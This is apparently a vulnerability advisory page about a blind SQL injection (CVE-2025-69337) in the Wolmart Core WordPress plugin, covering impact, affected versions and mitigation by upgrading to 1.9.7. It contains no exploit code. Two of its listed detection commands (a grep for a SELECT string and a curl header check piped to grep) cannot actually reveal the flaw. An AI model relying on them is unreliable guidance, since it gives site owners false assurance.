Plataforma
wordpress
Componente
wolmart-core
Corrigido em
1.9.7
CVE-2025-69337 describes a critical SQL Injection vulnerability discovered in the Wolmart Core WordPress plugin. This flaw allows attackers to perform blind SQL injection, potentially leading to unauthorized data access and manipulation. The vulnerability impacts versions from 0.0.0 through 1.9.6, and a patch is available in version 1.9.7.
The SQL Injection vulnerability in Wolmart Core allows an attacker to bypass security measures and directly interact with the underlying database. Because it's a blind SQL injection, the attacker doesn't receive immediate feedback from the database server, requiring them to infer data through techniques like timing attacks or boolean-based queries. Successful exploitation could lead to the extraction of sensitive user data, including usernames, passwords, email addresses, and order details. Furthermore, an attacker could potentially modify database records, leading to data corruption or unauthorized changes to the website's functionality. The impact is particularly severe given the plugin's likely use in e-commerce sites, where sensitive financial information is often stored.
CVE-2025-69337 was published on 2026-02-20. The vulnerability is considered critical due to the potential for data exfiltration and modification. No public proof-of-concept (PoC) code has been released at the time of writing, but the nature of blind SQL injection makes it likely that such a PoC will emerge. It is not currently listed on the CISA KEV catalog.
Websites using the Wolmart Core plugin, particularly those running e-commerce stores, are at significant risk. Shared hosting environments where multiple websites share the same database are especially vulnerable, as a compromise of one site could potentially lead to the compromise of others. Sites using older, unpatched versions of the plugin are most susceptible.
• wordpress / composer / npm:
grep -r "SELECT * FROM wp_" /var/www/html/wp-content/plugins/wolmart-core/• generic web:
curl -I https://your-wordpress-site.com/wp-content/plugins/wolmart-core/ | grep SQL• wordpress / composer / npm:
wp plugin list | grep wolmart-coredisclosure
Status do Exploit
EPSS
0.04% (percentil 12%)
CISA SSVC
Vetor CVSS
The primary mitigation for CVE-2025-69337 is to immediately upgrade the Wolmart Core plugin to version 1.9.7 or later. If upgrading is not immediately feasible due to compatibility issues or breaking changes, consider temporarily disabling the plugin to prevent exploitation. While a direct WAF rule is difficult to implement for blind SQL injection, implementing a WAF with generic SQL injection detection rules can provide a layer of defense. Regularly review database access logs for suspicious activity, specifically looking for unusual query patterns or attempts to access sensitive tables. Implement strong database user permissions, limiting the plugin's access to only the necessary data.
Atualize para a versão 1.9.7, ou uma versão corrigida mais recente
Análise de vulnerabilidades e alertas críticos diretamente no seu e-mail.
CVE-2025-69337 is a critical SQL Injection vulnerability affecting Wolmart Core WordPress plugin versions 0.0.0–1.9.6, allowing attackers to potentially extract data from the database.
If you are using Wolmart Core WordPress plugin versions 0.0.0 through 1.9.6, you are vulnerable to this SQL Injection flaw.
Upgrade the Wolmart Core plugin to version 1.9.7 or later to resolve this vulnerability. If immediate upgrade is not possible, temporarily disable the plugin.
While no active exploitation has been confirmed, the nature of blind SQL injection suggests potential for exploitation, and monitoring is recommended.
Refer to the official Wolmart Core plugin website or the don-themes support channels for the latest advisory and updates regarding CVE-2025-69337.
Envie seu arquivo de dependências e descubra na hora se esta e outras CVEs te atingem.
Envie seu arquivo de dependências e descubra na hora se esta e outras CVEs te atingem.